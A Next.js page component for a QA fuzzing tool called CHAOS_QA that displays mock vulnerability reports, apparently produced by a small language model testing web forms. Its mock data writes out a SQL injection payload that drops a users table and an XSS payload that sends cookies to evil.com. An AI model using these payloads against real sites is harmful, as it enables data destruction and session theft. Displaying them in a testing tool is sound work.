'use client';

import React from 'react';
import Link from 'next/link';
import styles from './reports.module.css';
import AnimatedBackground from '../AnimatedBackground';

export default function ReportsPage() {
  // Mock data for demonstration purposes
  const reports = [
    {
      id: 'BUG-042',
      title: 'Unauthenticated SQL Injection in Login Form',
      description: 'The accidental hacker persona successfully bypassed the login mechanism by injecting a raw SQL payload into the username field, resulting in a 500 internal server error that leaked database schema details in the response body.',
      severity: 'Critical',
      persona: '🏴‍☠️ The Accidental Hacker',
      payload: "' OR 1=1; DROP TABLE users; --",
      steps: [
        'Navigate to /login',
        'Focus on input#username',
        'Input chaotic payload',
        'Click button#submit'
      ]
    },
    {
      id: 'BUG-038',
      title: 'Persistent XSS via Profile Bio',
      description: 'The model generated a mix of valid English and unescaped HTML script tags. The frontend failed to sanitize the input, leading to arbitrary JavaScript execution when the profile page is viewed by other users.',
      severity: 'High',
      persona: '🤓 The Overthinking Dev',
      payload: "Hello world! <script>fetch('http://evil.com?c='+document.cookie)</script>",
      steps: [
        'Navigate to /settings/profile',
        'Focus on textarea#bio',
        'Input chaotic payload',
        'Click button#save'
      ]
    },
    {
      id: 'BUG-015',
      title: 'Form Validation Bypass with Unicode RTL Override',
      description: 'The International Traveler persona injected Right-To-Left (RTL) override characters mixed with emojis. This caused the UI rendering to break entirely and bypassed the maximum length validation on the backend.',
      severity: 'Medium',
      persona: '🌍 The International Traveler',
      payload: "مرحبا ‮[u202E]hello world 🐛",
      steps: [
        'Navigate to /contact',
        'Focus on input#subject',
        'Input chaotic payload',
        'Click button#submit'
      ]
    }
  ];

  return (
    <div className={styles.container}>
      <AnimatedBackground />

      {/* Top Navigation */}
      <header className={styles.topBar}>
        <Link href="/" className={styles.logo}>
          <span style={{ color: 'var(--neon-cyan)' }}>☣</span> CHAOS_QA
        </Link>
        <Link href="/dashboard" className={styles.backBtn}>
          ← BACK TO DASHBOARD
        </Link>
      </header>

      {/* Header */}
      <div className={styles.headerWrap}>
        <h1 className={styles.title}>VULNERABILITY REPORTS</h1>
        <p className={styles.subtitle}>GENERATED BY 0.6B PARAMETER CHAOS</p>
      </div>

      {/* Reports Grid */}
      <main className={styles.grid}>
        {reports.map((bug) => (
          <div key={bug.id} className={styles.reportCard}>
            <div className={styles.cardHeader}>
              <div className={styles.cardHeaderLeft}>
                <span className={`${styles.severityPill} ${
                  bug.severity === 'Critical' ? styles.severityCritical : 
                  bug.severity === 'High' ? styles.severityHigh : 
                  styles.severityMedium
                }`}>
                  {bug.severity}
                </span>
                <span className={styles.bugId}>{bug.id}</span>
              </div>
              <div className={styles.personaPill}>
                {bug.persona}
              </div>
            </div>

            <div className={styles.cardBody}>
              <div>
                <h2 className={styles.bugTitle}>{bug.title}</h2>
                <p className={styles.bugDesc}>{bug.description}</p>
                
                <span className={styles.codeBlockLabel}>Injected Payload</span>
                <div className={styles.codeBlock}>
                  {bug.payload}
                </div>

                <span className={styles.codeBlockLabel}>Reproduction Steps</span>
                <ol className={styles.stepsList}>
                  {bug.steps.map((step, idx) => (
                    <li key={idx}>{step}</li>
                  ))}
                </ol>
              </div>

              <div className={styles.screenshotCol}>
                <div className={styles.screenshotBox}>
                  <span>[ Screenshot Missing ]</span>
                  <div className={styles.screenshotLabel}>BEFORE ACTION</div>
                </div>
                <div className={styles.screenshotBox}>
                  <span style={{ color: 'var(--neon-red)' }}>[ Crash Detected ]</span>
                  <div className={styles.screenshotLabel}>AFTER ACTION</div>
                </div>
              </div>
            </div>
          </div>
        ))}
      </main>
    </div>
  );
}
